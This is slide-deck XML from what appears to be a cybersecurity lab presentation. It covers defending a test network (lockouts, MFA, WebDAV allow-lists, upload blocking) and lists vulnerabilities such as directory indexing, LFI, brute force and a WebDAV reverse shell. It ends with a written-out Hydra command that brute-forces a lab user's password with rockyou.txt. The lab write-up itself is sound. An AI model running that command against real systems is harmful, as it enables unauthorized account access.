              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>More than 10 failed login attempts within an hour from the same ip should lock out that ip</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An IDS capable of blocking malicious ips on its own without sysadmin input.</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a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stronger password requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mandatory MFA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CAPTCHAs </a:t>
            </a:r>
            <a:endParaRPr/>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74" name="Google Shape;1274;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5" name="Google Shape;1275;p76"/>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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An alarm should trigger if anyone from outside the company network and/or a non-approved ip tries to access WebDav</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04800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A single instance would trigger the alarm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p7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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The host should deny access to WebDav by default, and only allow access from specific IPs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Avoid storing instructions for how to access WebDav on a publicly accessible server</a:t>
            </a:r>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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Only approved IPs should be able to access WebDav.</a:t>
            </a:r>
            <a:endParaRPr/>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82" name="Google Shape;1282;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3" name="Google Shape;1283;p7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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Alert if invalid file types (such as .php) are uploaded to the network.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Alert if any port is opened</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a:t>A single instance should trigger an alert</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84" name="Google Shape;1284;p7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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File uploads should be blocked by default. Only approved IPs and/or internal workstations should be able to upload files.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prevent .exe files from being uploaded by default</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a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Have all uploaded files validated </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Have all uploaded files run through an antivirus</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3" name="Google Shape;1053;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9" name="Google Shape;1059;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Range:192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netmask:255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gateway:10.0.0.1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IPv4:192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS:Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname:ML-REFVM-684427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IPv4:192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS:Kali GNU (Linux 5.4.0)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname:Kali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IPv4:192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS:Ubuntu 18.04.1 LTS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname:ELK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IPv4:192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS:Ubuntu 18.04.1 LTS</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60" name="Google Shape;1060;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1" name="Google Shape;1061;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2" name="Google Shape;1062;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274500" y="1078850"/>
            <a:ext cx="6489750" cy="344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8" name="Google Shape;1068;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9" name="Google Shape;1069;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70" name="Google Shape;1070;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6" name="Google Shape;1076;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7" name="Google Shape;1077;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8" name="Google Shape;1078;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{96234C38-0285-4585-AF8B-4126F52289B3}</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ML-RefVm-684427 (Hyper-V Azure Host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NATSwitch (Cloud-based host machine)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Attacking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Network monitoring server running Kibana</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Victim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4" name="Google Shape;1084;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5" name="Google Shape;1085;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6" name="Google Shape;1086;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{96234C38-0285-4585-AF8B-4126F52289B3}</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200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Indexing Vulnerability</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CWE-548</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Attacker can view and download content from a confidential directory.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attacker can gain access to confidential data.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LFI Vulnerability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CVE-2021-31783</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LFI allows access into confidential files on a site.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An LFI vulnerability allows attackers to gain access to sensitive credentials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Brute Force Attack</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An attack that uses a wordlist to guess a user’s password by systematically </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>going</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> down a list until the right password is found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Common/easy to guess passwords can be found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Reverse Shell Backdoor</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CVE-2019-13386</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Allows an attacker to send a malicious payload which grants them access to the victim machine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 used WebDav to gain remote access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Directory Indexing Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1092" name="Google Shape;1092;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3" name="Google Shape;1093;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existence of a vulnerable folder was found simply by poking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>around</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> the company website</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5" name="Google Shape;1095;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1096" name="Google Shape;1096;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7" name="Google Shape;1097;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61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1099" name="Google Shape;1099;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0" name="Google Shape;1100;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 was able to perform a brute force attack against Ashton and gain access to the secret folder</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1103" name="Google Shape;1103;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="3008713"/>
            <a:ext cx="7505700" cy="90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Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;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0" name="Google Shape;1110;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 used Hydra and the rockyou.txt wordlist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2" name="Google Shape;1112;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1113" name="Google Shape;1113;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4" name="Google Shape;1114;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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116" name="Google Shape;1116;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7" name="Google Shape;1117;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 was able to login as user “ashton” and access sensitive files</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;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Command</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 hydra -l ashton -P rockyou.txt -s 80 -vV 192.168.1.105 http-get /company_folders/secret_folder</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